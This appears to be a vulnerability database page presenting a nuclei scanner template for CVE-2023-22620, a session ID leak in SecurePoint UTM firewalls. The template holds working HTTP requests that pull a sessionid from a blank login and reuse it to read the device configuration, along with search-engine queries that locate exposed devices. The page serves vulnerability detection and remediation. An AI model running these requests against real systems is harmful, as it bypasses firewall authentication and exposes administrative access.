Lucene search
K

SecurePoint UTM 12.x Session ID Leak

🗓️ 09 Jul 2026 03:01:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 33 Views

SecurePoint UTM 12.x Session ID Leak allows unauthorized access to administrative interface via sessionid disclosur

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
SecurePoint UTM 12.x Session ID Leak Vulnerability
18 Apr 202300:00
zdt
GithubExploit
Exploit for Cross-site Scripting in Astaro Security_Gateway_Software
30 Apr 201915:15
githubexploit
Circl
CVE-2023-22620
13 Apr 202302:29
circl
CNNVD
Securepoint Unified Threat Management 信息泄露漏洞
12 Apr 202300:00
cnnvd
CVE
CVE-2023-22620
12 Apr 202300:00
cve
Cvelist
CVE-2023-22620
12 Apr 202300:00
cvelist
NVD
CVE-2023-22620
12 Apr 202323:15
nvd
OSV
CVE-2023-22620
12 Apr 202323:15
osv
Packet Storm
SecurePoint UTM 12.x Session ID Leak
18 Apr 202300:00
packetstorm
Prion
Design/Logic Flaw
12 Apr 202323:15
prion
Rows per page
id: CVE-2023-22620

info:
  name: SecurePoint UTM 12.x Session ID Leak
  author: DhiyaneshDK
  severity: high
  description: |
    An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or perform actions on behalf of the user.
  remediation: Upgrade to version 12.2.5.1 or newer
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-22620
    - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2023-22620.txt
    - https://www.rcesecurity.com/2023/04/securepwn-part-1-bypassing-securepoint-utms-authentication-cve-2023-22620/
    - https://packetstormsecurity.com/files/171924/SecurePoint-UTM-12.x-Session-ID-Leak.html
    - https://rcesecurity.com
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 7.5
    cve-id: CVE-2023-22620
    cwe-id: CWE-863
    epss-score: 0.03888
    epss-percentile: 0.88982
    cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: securepoint
    product: unified_threat_management
    shodan-query:
      - title:"Securepoint UTM"
      - http.title:"securepoint utm"
    fofa-query: title="securepoint utm"
    google-query: intitle:"securepoint utm"
  tags: cve,cve2023,utm,leak,memory,packetstorm,securepoint,vkev,vuln

http:
  - raw:
      - |
        POST /spcgi.cgi HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/json; charset=UTF-8
        Accept-Encoding: gzip, deflate
        Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

        {"module":"auth","command":["login"],"sessionid":"","arguments":{"user":"","pass":""}}
      - |
        POST /spcgi.cgi HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/json; charset=UTF-8
        Accept-Encoding: gzip, deflate
        Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

        {"module":"system","command":["config","get"],"sessionid":"{{session}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '"status":"OK"'

      - type: word
        part: header_2
        words:
          - 'application/json'

    extractors:
      - type: regex
        name: session
        group: 1
        regex:
          - '"sessionid": "([a-z0-9]+)"'
        internal: true
# digest: 490a0046304402204ea93d04ca03255919ce7bf1eab975c625ef28aa1210ce49b54b0e51c03f6f830220401609a4b774a27e21259c4c36e3437597fa2d1bfa73673c9a0a6e49b1d97e21:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.17.5
EPSS0.03888
SSVC
33